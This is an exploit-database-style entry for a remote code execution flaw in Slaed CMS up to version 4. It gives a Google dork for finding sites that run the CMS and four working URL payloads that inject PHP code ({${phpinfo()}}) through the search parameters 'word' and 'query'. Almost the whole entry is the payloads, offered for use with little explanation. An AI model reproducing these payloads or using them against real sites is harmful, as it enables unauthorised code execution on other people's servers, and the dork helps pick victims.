Slaed CMS Code Exec Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Slaed CMS Code Exec Vulnerability
# Published : 2011-09-12
# Author :
# Previous Title : WordPress Advertizer plugin <= 1.0 SQL Injection Vulnerability
# Next Title : OpenCart v1.5.1.2 / Blind SQL Vulnerability

# Exploit Title: Slaed CMS Code exec
# Google Dork: "Powered by SLAED CMS"
# Date: 03.05.2011
# Author: brain[pillow]
# Software Link: http://slaed.net/
# Version: OpenSlaed 1.2 (free), Slaed CMS <= 4.*

On different versions of this software next vulnerabilities are availible:

/index.php?name=Search&mod=&word={${phpinfo()}}&query=ok&to=view
/index.php?name=Search&mod=&word=ok&query={${phpinfo()}}&to=view

OR:

/search.html?mod=&word={${phpinfo()}}&query=ok&to=view
/search.html?mod=&word=ok&query={${phpinfo()}}&to=view